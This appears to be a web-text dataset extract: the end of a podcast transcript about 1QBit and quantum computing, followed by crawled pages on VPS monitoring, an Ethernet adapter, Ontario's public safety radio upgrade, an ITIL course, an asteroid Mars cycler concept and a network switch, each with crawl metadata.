would like a material that looks like this.” Then you can go and design that material in your virtual world. Once you’re convinced that you’ve designed something that will achieve it, then the problem becomes, “How do I produce this material that I know I want?” Instead of, “I’ve produced this material but I need to figure out what it’s for.” I think that if you can imagine the ability to search massive amounts of potential materials without having to actually build them first, will really expand our ability to produce novel, bespoke materials that are helpful for particular engineering challenges. We think that this will start by producing really basic things like catalysts, very small pieces of matter that speed up or slow down different reactions. It will expand from these very small pieces all the way through to more advanced materials, differentiated polymers, and eventually, we think into the interactions of the human body and the material world in a way that is really what drugs are. Being able to change into a mode of saying, “I have this particular challenge occurring in my body. What do I need to produce in order to influence my body to change its behavior?” These are deep questions that are not going to be answered overnight. The journey of the next 100 years of quantum computing is really going to be about having the tools for the first time to have a real shot at solving these problems in a very succinct and detailed way. I think that quantum computers are going to make their first mark on the world by really transforming the physical world, allowing us to build materials, for example, that are much stronger and lighter than the ones that exist today, or that have particular characteristics that exactly suit the needs of some of the most challenging applications, where our current limitation is being able to actually produce the materials that give the desired effect that we want. We often know what we would like, we just don’t know how to actually produce those things. That’s one of the big changes that I think we’ll see coming from quantum computing. Thierry Harris: You’re describing this with regards to materials, but it can also, as you said, be materials for drug discovery. You’ve talked a lot in the past about the financial world, a little bit earlier in this podcast as well, in terms of some of the problems that they have in terms of predicting markets, and high finance, risk assessment, and analysis. And very interesting when you were talking about physics and finance going together. It’s quite beautiful and eloquent to see the math there, behind that. Again, great stuff we’re looking now at what 1QBit is within that realm. You’ve said that 1QBit acts as a bridge between the technology at the fundamental level, the new hardware that’s being produced, and the real-world applications. Outside of Dow, can you give us a few more industries or sectors that you’re interfacing with and what kinds of problems that they’ve been presenting you, just so we can, as students studying the business portion of this understand the potential of your market? Andrew Fursman: Yes, I really like exactly the setup that you just gave. I think that the analogy of computational finance, the traditional method of computational finance is a great allegory for how we could see the development of quantum computing. That is to say, many of the initial uses of traditional computers within the finance world came from repurposing algorithms that were designed in order to simulate the physical world. For example, a lot of the work that was done in options pricing, which is a computationally expensive, or a challenging form of calculation that’s helpful to know how much you should pay for a particular financial instrument, is really all about repurposing algorithms that were initially designed in order to correct the trajectory of rockets. In the same way that you could say, back in the day, computers were used to simulate the physical world in order to help to guide rockets. Then, that form of mathematics was repurposed into the financial market in order to provide capabilities that seemed very far from the initial area of exploration, but that opened up entire new areas for computation and new areas of human understanding. We think that some of the algorithms that are first developed in order to do the simulation of the physical world through a quantum information lens can then be repurposed into different areas in order to provide real value outside of physically simulating the physical world. A great example would be, we believe that some of the fundamental calculations that are helpful to simulate the physical world can also be used to animate new forms of machine learning. In some cases, old forms of machine learning where the bottleneck to wider adoption was just that the computational capabilities of classical computers didn’t mate nicely with the problems that were necessary to solve in order to harness these forms of machine learning. If we can take some of the interesting sampling capabilities of quantum processors that are developed in order to do material discovery and repurpose that into a more abstract information processing to animate forms of machine learning, you could imagine similar algorithms being deployed in order to produce much more robust artificial intelligences, for example. That’s the exciting work that really, you can only make those connections if you have both a great understanding of, say, the materials industry, and a very detailed understanding of the quantum devices that are going to be applied to solving those problems. Then comes the third step of being able to take those technologies and apply them to an adjacent field. 1QBit has actually developed as a very inter-disciplinary, multi-disciplinary collaborative approach where we try and bring together researchers from very different fields in order to understand where those real points might be, and to really help produce innovation at those edges that are between different spaces. That’s been an exciting part of the 1QBit journey. Thierry Harris : I asked Andrew to unpack how we got from the idea to quantum computers in the 1980s to where we are today, and what 1Qbit’s relationship was with one of their quantum hardware suppliers, D-wave. Andrew Fursman: Quantum computers, as an idea, have been around since the 1980s in the same way that you can say time machines have been around since the 1800s in that people have thought about them. It’s only really right this moment that we’re starting to see the first realizations of that idea come to fruition. The first devices that could really be called quantum computers in the way that people imagined that quantum computers might evolve. This moment is really the fulfillment of a journey that started in the 1980s, saying, “I think you could probably build a machine that looks like, for example, an IonQ, iron trap device.” Now, we’re just starting to see those things emerge. When I was speaking earlier about the different types of quantum computers, I intentionally really spoke about what people usually mean when they talk about a quantum computer, which is a universal circuit model quantum device. But you can also do many different types of calculations utilizing these same types of quantum information processing fundamentals. For example, in traditional computing, there are digital computers, which are the types of computers that most of us are familiar with, but there are also analog computers, computers that really operate less in the binary, 011 realm, but instead operate on a continuous spectrum. These are much less common, but the history of traditional computing is one of both analog and digital computers. We have the same distinction within quantum computers. An organization like D-Wave made a decision early on to try and say, “Maybe universal circuit model quantum computers will emerge in the distant future, but D-Wave really has its roots all the way back to 1999.” They made a very conscious choice to say, “Let’s try and see if there’s something that you can do with quantum information processing, which isn’t as challenging as building a universal quantum computer, but which can still solve very specific problems. You could think of it as an application-specific quantum information processor. That concept shouldn’t be too foreign to your listeners because, for example, the rise of machine-learning has been heavily advanced by GPUs or graphic processing units, which are themselves application-specific computing components. The D-Wave machine, the D-Wave quantum annealer is an analog quantum computer that is specifically designed in order to answer what are called quadratic unconstrained binary optimizations, but which really just mean answering an optimization problem. They’re not able to perform things like Shor’s algorithm that might be used in the future to break encryption. It’s not particularly useful for doing the chemistry applications that we were talking about previously, although there are some simulation capabilities of these machines. In general, it’s about saying, “What’s the low-hanging fruit and how do I try and take a shortcut to a useful device by making a specific thing for a specific purpose, instead of trying to build a device that does all of the rich capabilities that we anticipate for future quantum computing devices?” There’s actually an entire subset of the quantum computing market that is all across the spectrum that goes from– For example, one of our partners, Fujitsu, has built an application-specific integrated circuit, which simulates the annealing process, so we call it a digital annealer. This is the most classical exploration of the capabilities of near-term quantum computing devices. The D-Wave machine is again one of these analog machines, but there is other work that is being done that has the capability to do some of that analog computing, including our partners at NTT has some very exciting devices which utilize exotic forms of computation in order to answer these same problems. Even ion trap computers are capable of doing analog computation. I think the journey from no quantum computers through to universal fault-tolerant error-correcting quantum computers is one that we don’t know exactly what that path might look like, but some organizations have said, “Let’s try and take a minimum viable product approach as opposed to going for a waterfall approach of, step one, build a big quantum computer.” Instead saying, “How couldn’t we build a specific quantum calculator?” Even aside from the types of distinctions that I drew at the beginning, where we were talking about the difference between, photons, ions, and superconducting machines, there are different types of devices that you can make with those different components. The D-Wave machine is one exploration of a specific type of machine. Of course, D-Wave is a company who could build or which could build many different types of devices. The current D-Wave processors have really been looking at this niche and specific idea of optimization and a few other adjacent fields as a toe-hold into this wider world of quantum computing. What’s nice is with such a diversity of approaches and the diversity of fundamental units of computing, we really have a whole bunch of different ways of trying to build these initial devices that make it so that’s there’s this plurality of approaches that’s really exciting for someone who is trying to harness these new capabilities because each of these different machines have different strengths and weaknesses and time horizons. As somebody thinking about applications, we really cheer on that diversity. Thierry Harris: I asked Andrew to clarify the idea of using quantum computing to that of using a utility. Andrew Fursman: Yes. I think about the distinction of a computing utility versus a computing product as something that we’re all actually intimately familiar with now. If you use almost any application on your computer today, you’re not just using your local computer; you’re using the computing of the cloud. For example, I actually have very little understanding of what types of computation happen on the backend of making a request to something like Google Maps. You just want to know, “How do I get from here to there?” You’re able to clearly articulate the problem. You say, “I am currently in this location. I would like to get to that location. Please give me the steps that I need to take in order to go there.” You send that off to the cloud. They do some processing on the backend. It might be done with CPUs or GPUs or FPGAs or in the future quantum computers. The important thing is I don’t really care as a consumer. I just want to make sure that I’m getting the best directions, and that I’m able to get from here to there with the least number of turns, spending the least gas, et cetera. That’s how I think that quantum computing is actually going to be most widely deployed into people’s lives. It’s in a way where it’s almost invisible. Meaning, the applications, if we do things well, you’re not going to be excited about utilizing a quantum computer because it’s a quantum computer. You’re just going to be excited that you get better directions from Google Maps, for example. That’s a purely hypothetical example, but I think it illustrates the difference between buying a computing device versus just getting the utility that comes from that knowledge. The way that we imagine interacting with quantum computers in the medium term is actually exactly the same way that 1QBit interacts with computers today, which is if we’re interested in solving a chemistry problem, then we engage with a cloud-hosted quantum computer. We take the industrial framing of the problem and convert it into a form that the quantum computer is able to understand. We then pass that information to the quantum computer, which solves the problem in its native form. We then take that solution and interpret it back into the language of the industrial problem. Ultimately, the industrial user just gets a solution to the problem that they’re looking at, whether it’s something like, “How should I build this material?” or “What are the properties of this material?” or “What should I trade in a financial market?” Ultimately, the reason that these things are useful is not because they’re using quantum information to solve those problems. It’s because they’re providing better answers than the next best alternative that we have available. The idea that the product is really the answer from the computer as opposed to the computer itself is that distinction. Of course, because cloud computing already works this way and actually the initial architecture and use of computers was many people sharing time on these big mainframes. This is not really a departure from the longer history of computation. In fact, it’s more the norm as opposed to the exception. Andrew Fursman: 1Qbit’s perspective is that exactly as I just described, people ultimately won’t want to use quantum computers for the sake of quantum computers. They’ll want to use applications that harness quantum computers to provide better answers because they care about better answers. 1Qbit’s approach is to say, we have some visibility into the types of industries that are likely to be augmented by, or disrupted by quantum computers. Our interest is in getting into those industries, getting out in front of quantum computers as opposed to the capabilities coming along, and then saying, wow, we should really think about getting into quantum chemistry. Instead, we’re getting into quantum chemistry, knowing that success within quantum computers will provide a really unique advantage. To the extent that we believe that quantum computers or exotic forms of computation might augment machine learning capabilities, we have been doing a lot of work to be able to commercialize current methods of artificial intelligence within industries that we think are relevant to quantum computers, so that if quantum computers provide new capabilities, we’re already in the industries that can benefit from those capabilities. That’s what we’ve tried to do over and over again, is to be positioning ourselves, to be the best-positioned organization, to harness the capabilities of these devices while at the same time, using those insights to partner with the hardware organizations and to do our own fundamental research, to understand how could you build better devices that are more capable of accelerating these industries. Thierry Harris: 1Qbit received funding from Canada’s Digital Supercluster. A government sponsored program focused on fostering innovation in digital technology companies. Andrew elaborates. Andrew Fursman: One of the things that we believe is that there’s a real capability for quantum information processing to augment the capabilities of artificial intelligence and machine learning. In order to prove that there is real industrial value, we think that it’s very valuable to be out in the marketplace, selling products and services that take advantage of that fundamental artificial intelligence capability. In the case of the supercluster work, we have produced a software suite that is capable of providing a co-pilot for radiologists, essentially helping them understand and to point out more abnormalities. Our first product was a chest X-ray anomaly detector that’s useful for detecting the types of pneumonias that can come from things like the current COVID pandemic. By essentially having a product that harnesses the state-of-the-art in machine learning capabilities, we know that to the extent that that state of the art is advanced by any of the technologies that we work within our hardware innovation lab. We now have a path all the way from the hardware, right to the industrial output, which is, in this case, better outcomes for people in the Canadian health system. We have the ability to say, if I swapped out my current processor for this new device, does that further improve the outcomes? To the extent that that answer is yes, that we know that that’s a useful advancement on the hardware and to the extent that the answer is no, we know that that hardware is not yet ready for commercialization. Essentially, we use the industrial reality as the measuring stick by which we judge the meaningfulness of any of these advances on the hardware side. Thierry Harris: While the market adoption of the technology is a key measuring stick for 1Qbit’s success. The advancement of pure science is also important to the company. Andrew Fursman: As a geek, I think and I should say as a team of geeks, I think all of us really have a soft spot for advancing technology just purely from a scientific perspective. Because we’re doing this in the context of a business, of course, the real measuring stick is, are you able to produce more value than what it costs to get there? I think we love to produce technology because we believe technology produces value and utilizing our market success as a measuring stick is a very helpful way to ensure that we’re not just climbing Mount Everest because it’s there. Thierry Harris: The development of Quantum computing will come from partnerships from core Quantum companies like 1Qbit with various industry players to help solve problems in their respective fields and to find new opportunities to develop applications using the power of quantum technology. In this spirit of collaboration, I asked Andrew to put out a question for our audience to ask them what he would like to see people studying 1Qbit to be working on. Here is what he had to say. Andrew Fursman: Well, back to your point previously of how long people have been thinking about quantum computers it’s very interesting that some of the most important algorithms in quantum computers were developed before those quantum computers really existed. A great example is Shor’s algorithm, the procedure that you would take with a quantum computer in order to improve the factoring capabilities of our computational capabilities as humanity. This is very exciting because it shows that even without access to a quantum computer if you understand the fundamentals of quantum computing, you can develop applications without even having access of these machines. What’s really different today than when Peter Shor was first thinking of Shor’s algorithm is now we actually have fledgling quantum computers that we can use to test those assumptions. What I would recommend is that as opposed to trying to think about quantum computing in this abstract, it’s just a more powerful computer, if you really want to make an impact in this field, the first thing you need to do is to put in the work to understand how these machines really operated at low level, and then you can use your creativity and imagination to expand the fundamental computing capabilities at these low level of what you might think of as the building blocks upon which you can build applications. At the moment, we actually have a very small number of these building blocks and I think that as more people put their minds toward this, we’re going to see that, although there’s maybe five or six really exciting fundamentals that we’re aware of right now, there are probably thousands more that just haven’t been discovered because not enough people have been thinking about this. [start end music] Andrew Fursman: I love the idea of more people first learning about how these machines work at a low level and then imagining what other things they could do. That’s going to really blow up this industry and help expand the usefulness of quantum computers to many different areas that we can’t even imagine today. Thierry Harris: All right, well, let’s make that happen. Andrew Fursman: Absolutely. That’s very exciting, Andrew. Thank you so much. Anything else you would like to add? Andrew Fursman: I just want to say thanks for the opportunity to connect with your listeners. To the extent that people are interested in learning more about this, of course, they can visit our website at 1QBit.com. For people who are very excited to dig in and maybe think a little more, 1Qbit’s always bringing on interns and practitioners. We’re expanding all across Canada, from Vancouver into Calgary and Edmonton. We have great partnerships with the Saskatchewan Health Authority. It’s been important for that supercluster work that you’ve talked about. We have new offices opening up in Quebec and we have a deep partnership in Sherbrooke. We’re trying to take a Pan-Canadian approach to quantum computing for the benefit of all humanity and if you’re excited about that, we’d love to hear from you. Thierry Harris: That’s all for today folks, there is so much more we could discuss with quantum computing, and we haven’t even touched upon adjacent topics such as quantum communication networks and quantum sensor technologies. If you’d like to share further research on the quantum ecosystem, write us at solutions@ie hyphen knowledgehub.ca and we’ll add links to our episode page to keep the conversation going. [begin promo music] Narration: And now a final word from our sponsor, the IE-KnowledgeHub. IE-Knowledge Hub is a website dedicated to promoting learning and exchanges on international entrepreneurship. If you are an education professional looking for course content, an academic researcher seeking research material , or someone interested in business innovation check out IE-Knowledge Hub. Let’s pickup where we left off for Prevtec Microbia, a small biotechnology company creating live bacterial vaccines to help counter E. Coli in swine. Eric Nadeau: We had to take a decision what to do with it? At that time we were thinking more to, to, to develop and to provide to, to the veterinarians, it was not a business sense. It was ok then we have this the veterinarians need it, what we can do to transfer this to the veterinarians? Narration: That’s Eric Nadeau, co-founder of Prevtec Microbia. Nadeau is describing the ideation behind creating Prevtec. He had developed the coliprotech vaccine as a post doc student under the supervision of Dr. John Fairbrother, a world expert on E.coli. He knew his technology could work. But how could he get from the university science lab to building a business? Eric Nadeau: We went through all the process into the university. We have to do a declaration of invention, and after that to convince the dean of the faculty that our project is solid. And it was difficult for them, because we had John Fairbrother as a fundamental scientist, and not a business person, and his dolphin, a young post doctoral student. and it took two years to convince the faculty and the university by itself, the University of Montreal. Narration: To help them get up and running the firm hired an experienced CEO, Michel Fortin. Fortin knew that to be able to make Prevtec into a profitable business he had to get the regulatory approval in the right markets. Michel Fortin: When I started with the company we had the first vaccine which is coliprotec f4 which is for specific disease in the swine industry. And our objective was first to get this product approved in Canada to distribute it in Canada which is our home base, which was easier for us to do all the tests and do everything that is required to get to that license or regulatory approval. With the objective that after that once we get the first product out in Canada is to take this product to other countries to have a global approach. And one of the first opportunities was going to be in Brazil. Because brazil has a very large production of swine, and also the regulatory people work very closely with the regulatory people of Canada. So with our Canadian dossier, we were able to start the regulatory process in Brazil, without incurring very very expensive costs. Then after that we decided to get our product distributed in Europe. Why europe? We are an alternative to antibiotics, which is getting controlled and/or banned. So it was a prime market for us. Narration: You’ve been listening to segments of the Prevtec Microbia video case study. Learn more about how to take a technology from the laboratory to the market by watching their full case available for free at IE hyphen knowledge hub dot ca. [End promo music] Thierry Harris: Market Hunt is produced by Cartouche Media in collaboration with Seratone Studios in Montreal and Pop Up Podcasting in Ottawa. Market Hunt is part of the IE Knowledge Hub network. Funding for this program comes from the Social Sciences and Humanities Resource Council of Canada. Executive producers Hamid Etemad, McGill University, Desautels Faculty of Management and Hamed Motaghi, Université du Québec en Outaouais. Associate producer Jose Orlando Montes, Université du Québec à Montréal. Technical producers Simon Petraki, Seratone Studio and Lisa Querido, Pop up Podcasting. Show consultant JP Davidson. Artwork by Melissa Gendron. Voiceover: Katie Harrington. You can check out the IE-Knowledge Hub case studies at Ie hyphen knowledge Hub dot ca. For Market Hunt, I’m Thierry Harris, thanks for listening. [End Credits Music]
systems_science
https://elhostingbarato.com/en/definitions/monitoring-and-rebooting/
2022-08-20T06:13:20
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573908.30/warc/CC-MAIN-20220820043108-20220820073108-00136.warc.gz
0.958046
384
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__94300357
en
Monitoring and Rebooting in VPS You can benefit from our service with each VPS plan that we offer and you could order the Managed Services bundle anytime with no more than several mouse clicks either when you register or through your billing area. Our system admins will monitor the system processes on your Vps not only manually, but also by employing an advanced automated system, so they will be notified the moment something goes wrong - a script that employs too much memory or CPU time, a process which has stopped responding or has gone offline for reasons unknown, etcetera. They will investigate the cause of the issue and will restart your Virtual private server. With this upgrade you'll be able to save funds for overpriced third-party monitoring services which some organizations offer, but even if they alert you about a problem, they cannot do anything to solve it. Our system administrators, in contrast, have both the capabilities and the access to do this right away. Monitoring and Rebooting in Dedicated Hosting The Managed Services bundle can be added to any of our Linux dedicated hosting services whenever you want, so whenever you decide you need it, you can order it with a few clicks and our administrators will enable an array of automated checks for the status of different system processes on the hosting machine. This will save you a lot of funds for third-party monitoring services from firms that can't resolve a problem even if they identify one since they'll not have access to your server. Our experienced staff can quickly resolve any problem - a frozen system process, a script that's consuming a lot of processing time or memory, etc. They will find out what the cause of the problem was in order to take care of the latter in the best suited way and will reboot the hosting server if that's required to restore its correct functioning. Thus you won't need to bother about potential problems or deal with administration tasks.
systems_science
https://inter-tech.de/en/products/archive/networking/ad1101
2021-06-24T12:13:32
s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488553635.87/warc/CC-MAIN-20210624110458-20210624140458-00182.warc.gz
0.652544
556
CC-MAIN-2021-25
webtext-fineweb__CC-MAIN-2021-25__0__184186686
en
EOL Fast Ethernet PCI Adapter The netis AD1101 Fast Ethernet PCI Adapter is a highly integrated and costeffective Adapter that supports 32-bit data transfer and reduces CPU loading using bus master architecture. It also provides WOL and Boot-ROM. The netis Fast Ethernet PCI Adapter keeps low cost and eliminates usage barriers. It is the easiest way to upgrade a network from 10 to 100Mbps. It supports both 10Mbps and 100Mbps network speed both in Half-Duplex and Full-Duplex transfer modes, using Auto-Negotiation technology to detect the network speed It also can be widely used in most modern Operating System. - Support 32-bit PCI interface - Comply with the IEEE 802.3 10Base-T, IEEE 802.3u 100Base-TX specifications - Support Full-Duplex, achieve up to 20M/200M network bandwidth - Plug and Play - Support Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8/8.1, Linux, MAC OS Hardware Standards IEEE 802.3 10Base-T IEEE 802.3u 100Base-TX Interfaces 32-bit PCI-E 1x 10/100Mbps RJ45 Port Auto-Negotiation, Auto MDI/MDIX LED LNT/ACT Cabling Type UTP CAT 5 EIA/TIA-568 100-ohm screened twisted pair (STP) Date Transmission Rate 10/100Mbps (Half-Duplex) WOL RPL/PXE BOOT-ROM Other Data Network Driver Windows 98 SE, Windows ME, Windows 2000, Windows XP (32/64 bits), Windows Vista (32/64 bits), Windows 7(32/64 bits), Windows 8/8.1 (32/64 bits), MAC OS 9.0/10.04/10.1/10.2 Certification FCC, CE Environment Operating temperature: 0°C~40°C Storage temperature: -40°C~70°C Operating humidity: 10%~90% non condening Storage humidity: 5%~90% non condening Dimension (l/w/h) 120 x 125 x 20mm Guarantee 36 months Scope of delivery & Features Scope of delivery Low Profile Bracket Quick Installation Guide Features Logistical data Shipping Unit 1 Pcs Packing Unit 100 Pcs Weight net = 0.04kgs gross = 0.12kgs Item number 88883037 EAN-Code 6951066950287 No further information is available for this product. No special accessories are available for this product.
systems_science
http://newtectimes.com/?p=23492&upm_export=doc
2019-03-22T04:43:11
s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202628.42/warc/CC-MAIN-20190322034516-20190322060516-00393.warc.gz
0.936195
732
CC-MAIN-2019-13
webtext-fineweb__CC-MAIN-2019-13__0__54132681
en
This page was exported from New Tecumseth Times Export date: Fri Mar 22 4:43:11 2019 / +0000 GMT By Brock Weir Premier Doug Ford was flanked by local firefighters last Thursday while announcing new measures that will increase public safety. Joined by Simcoe-Grey MPP Jim Wilson, Mr. Ford announced a significant province-wide modernization project that will replace infrastructure in Ontario's Public Safety Radio Network, a resource which frontline and first responders rely on during emergency situations. “This modernization project is long overdue," said Premier Ford. "Our frontline and emergency responders need to have reliable, modern tools and resources in place to do their jobs and we are going to make sure this life-saving system gets underway." This multi-faceted project will ensure Ontario's more than 38,000 frontline and emergency responders — including OPP police officers, paramedics and hospital staff, fire services, provincial highway maintenance staff, as well as enforcement and correctional officers — can count on the communications infrastructure, network and equipment they need when responding to emergencies. "Ontario's Public Safety Radio Network is one of the largest and most complex in North America and yet one of the last not to comply with the North American standard," said Michael Tibollo, Minister of Community Safety and Correctional Services. "The daily service outages experienced with the network compromise our frontline and emergency responders' ability to react to emergencies and put the safety of the public at risk." The modernization project will: Rebuild the network's aging infrastructure (telecommunications towers, antennae, shelters and technology) that provides essential public safety radio coverage across the province Provide frontline and emergency responders, as well as their dispatchers, with the state-of-the-art radio equipment and consoles they need to manage calls and ensure the right responders get to the right place with the right information at the right time Provide maintenance services to restore network connection and repair equipment for a duration of 15 years. "The Public Safety Radio Network is essential to helping front-line responders communicate with each other to provide Ontarians with vital emergency services," said Christine Elliott, Minister of Health and Long-Term Care. "By replacing this aging system with state-of-the-art technology, we are providing resources to paramedics, police officers, fire services and others to keep Ontarians safe." The new network is expected to be fully operational by 2023, with new service phased in by 2021. Infrastructure, equipment and services required to set up and maintain the new network will be acquired through a multi-vendor procurement process. The new network will also present potential opportunities for generating revenue, which will benefit taxpayers. In the meantime, a risk mitigation strategy has been developed to ensure that public safety is not compromised and that the current network is maintained until the new network is fully operational. “The recent tornadoes experienced in Eastern Ontario prove how important it is for us to modernize our Public Safety Radio Network," said Steve Clark, Minister of Municipal Affairs and Housing. "The upgrades will help municipal first responders like paramedics, fire services and police do their important jobs better.” Post date: 2018-10-19 14:52:14 Post date GMT: 2018-10-19 18:52:14 Post modified date: 2018-11-30 20:01:23 Post modified date GMT: 2018-12-01 01:01:23 Powered by [ Universal Post Manager ] plugin. MS Word saving format developed by gVectors Team www.gVectors.com
systems_science
https://www.career.edu.pk/courses/72-itil-foundation.html
2018-01-17T06:37:45
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886830.8/warc/CC-MAIN-20180117063030-20180117083030-00207.warc.gz
0.903062
204
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__205658738
en
ITIL is the result of the UK government’s Cabinet Office documenting a set of processes and procedures for the delivery and support of high quality IT services, designed and managed to meet the needs of an organization. ITIL can be adopted by an organization and adapted to meet its specific needs. By completing this ITIL Foundation course, you will gain an understanding of the importance of service management, both to the IT service provider, and to its customers. - An Introduction to IT Service Management - Service Portfolio Management - Financial Management - Business Relationship Management - Service Strategy - Service Design - Designing the Service Solution itself - Designing the service management system and tools that will be required to manage the service - Understanding the importance of management and technology architectures - Understanding the processes that will be required - The measurement systems, methods and metrics that will show us whether the service is working properly or not - Service Transition - Service Operation - Continual Service Improvement
systems_science
http://inigopress.com/solar-express/
2019-05-19T09:11:35
s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232254731.5/warc/CC-MAIN-20190519081519-20190519103519-00287.warc.gz
0.934779
962
CC-MAIN-2019-22
webtext-fineweb__CC-MAIN-2019-22__0__199160590
en
Buzz Aldrin, one of the Apollo 11 astronauts, earned an Sc.D.. in Astronautics from MIT. He proposed use of a “Mars Cycler” to minimize transit costs between Mars and Earth. A cycler trajectory encounters two or more bodies on a periodic basis. A Mars cycler is an elliptical orbit that crosses the orbits of Earth and Mars, and encounters both planets at the points where it crosses their orbits, although not necessarily on every orbit. Aldrin identified a Mars cycler corresponding to a single synodic period. The Aldrin cycler (as it is now known) makes a single eccentric loop around the Sun. It travels from Earth to Mars in 146 days, spends the next 16 months beyond the orbit of Mars, and takes another 146 days going from Mars back to Earth. (Wikipedia) Since a cycler is in a (relatively) stable orbit, it needs (relatively) little fuel to stay on track. It can serve as a transport for humans and/or materials from Earth to Mars and vice versa. In my sci fi future Worlds of Sol the United Nations of Sol have moved mining and manufacturing off Earth into space for climate remediation. Mining extracts raw materials from asteroids. The raw materials are then transferred to factories in space. The UNS has mining/manufacturing complexes in both L4 and L5 Earth-Moon Lagrangian points. The UNS uses repurposed nuclear weapons from the 20th century Cold War to move asteroids between the Belt and either Earth or Mars on Hohmann trajectories. Mars is a waypoint to support asteroid mining as well as a terraforming project to give all humans on Earth a stake in a future in space. This world needs a lot of infrastructure to be viable. Asteroid mining and Lagrangian point manufacturing allows the UNS to create a closed cycle with minimal requirement to boost mass out of Earth’s gravity. Raw materials come from space. Manufactured goods are sent to Earth in cargo pods by decelerating the pods with electromagnetic accelerators at the factories. The pods reenter, bleed off significant speed (and energy) in the atmosphere and at the surface fly into electromagnetic linear decelerators. Only the empty pod need be sent aloft again. Or, the pod itself could be used as a cargo container for ships to transport goods from an oceanic landing complex around the world. To send manufactured goods or humans to Mars, the UNS must sent them in pods to rendezvous with the cycler. One of the major problems for humans going from Earth to Mars is radiation. Radiation shielding is heavy and thus fuel-consuming for a conventional spacecraft. There’s a lot of speculation on the Internet about building a Mars cycler and using it to allow two-way travel between Earth and Mars. It occurred to me that using an asteroid as the Mars cycler would allow (1) fantastic shielding for a crew inside, (2) the possibility of creating artificial gravity inside an asteroid by hollowing it out and spinning it and (3) the ability to send enormous amounts of bulk and weight between the two planets. The only problem is, how do you get an asteroid into a cycler orbit? My idea is to use the nuclear weapon propulsion mechanism to change the orbit of an Earth-crossing asteroid to a Mars cycler orbit. Once the asteroid is in orbit, people and/or cargo can be loaded aboard at the embarkation point and offloaded at the debarkation point. It’s necessary to accelerate the payload to the cycler orbital velocity prior to departure, join in formation on the cycler and transfer the payload to the asteroid. It’s also necessary to decelerate the payload at the destination. If this is done with fuel aboard the rendezvous vehicle it’s necessary to bring fuel from Earth for both of these purposes. A lot of people complain that a cycler orbit takes so much delta-V to reach that the carrier vehicle might as well continue all the way to Mars. But imagine something like a 747, with people crowded in and minimal shielding, to take people or cargo to the cycler. People and cargo can be transferred inside where the major storage and living facilities are carved out of the asteroid.The transfer vehicle need not provide a lot of life support, artificial gravity, radiation shielding or much else. It can go back to Earth or ride along and transfer goods to Mars at the other end. The Mars cycler figures in my WiP novel Fire in the Sky, which uses a relatively flimsy cycler to go to Mars, then to the Belt, to find an asteroid for the Solar Express.
systems_science
https://naasongs.fun/l3-network-switch-prefered_-s5300-48m6x-1/
2023-12-03T14:27:47
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100508.23/warc/CC-MAIN-20231203125921-20231203155921-00143.warc.gz
0.933626
730
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__236852672
en
The S5300-48M6X is a high-performance L3+ 10g network switch designed to meet the demands of modern enterprise-level networks. With its 216 Gbps switching capacity and 162 Mpps forwarding rate, the S5300-48M6X provides exceptional performance and reliability. It is equipped with 1+1 redundant hot-swappable power supplies and built-in 2 intelligent fans, making it an ideal solution for mission-critical applications. One of the key features of the S5300-48M6X is its support for Layer 3 functions. As a Layer 3 switch, it is capable of routing traffic between different networks, making it an essential component of any enterprise network. It supports protocols such as BGP, ECMP, and PBR, which enable it to create and manage complex network topologies with ease. The S5300-48M6X is also a 10g switch, which means it supports data transfer rates of up to 10 Gbps. This high-speed connectivity is essential for applications that require large amounts of data to be transferred quickly, such as video streaming, file sharing, and virtualization. The 10g switch also provides a higher level of network performance, enabling more users to connect simultaneously without experiencing any performance degradation. These include its low latency, which ensures that network traffic is processed quickly and efficiently, and its support for Quality of Service (QoS) features, which enable network administrators to prioritize certain types of traffic to ensure that critical applications receive the bandwidth they need. Easy to use is an essential feature for users, The S5300-48M6X is easy to manage, with both CLI command line and WEB management interfaces available. This makes it simple to configure and monitor the switch, and it can be managed remotely, which is particularly useful for large, distributed networks. The switch also supports a range of protocols and features that enhance its functionality and reliability, including MSTP, ERPS, VRRP, and ISSU. Flexible IPv6 functions are also supported, making the S5300-48M6X an ideal choice for organizations that are transitioning to IPv6. IPv6 is essential for supporting the growing number of devices that use IPv6 addresses, and it makes it easy to manage and configure IPv6 addresses and protocols. Overall, the S5300-48M6X is an excellent choice for organizations that require a high-performance, reliable, and easy-to-manage network switch. Its Layer 3 functionality, support for BGP, ECMP, and PBR, and high-speed connectivity make it ideal for modern enterprise-level networks. Finally, it is designed to be energy-efficient, with support for a range of power-saving technologies such as Energy-Efficient Ethernet (EEE) and port sleep mode. These features help to reduce power consumption and operating costs, making the switch an environmentally friendly and cost-effective solution for enterprise networks. In conclusion, the S5300-48M6X is a powerful, flexible, and reliable L3+ 10g network switch that is ideal for enterprise-level networks. Its advanced security, scalability, and high availability features, along with its energy-saving capabilities, make it an attractive choice for organizations that require a high-performance and cost-effective network switch. Overall, the S5300-48M6X is a great investment for any enterprise that wants to build a fast, reliable, and secure network infrastructure that can meet the demands of today’s data-driven world.
systems_science
https://safaldas.in/is-a-session-based-or-jwt-based-authentication-good-for-containerzied-application-using-docker/
2024-04-18T21:03:26
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817239.30/warc/CC-MAIN-20240418191007-20240418221007-00779.warc.gz
0.883374
583
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__180484950
en
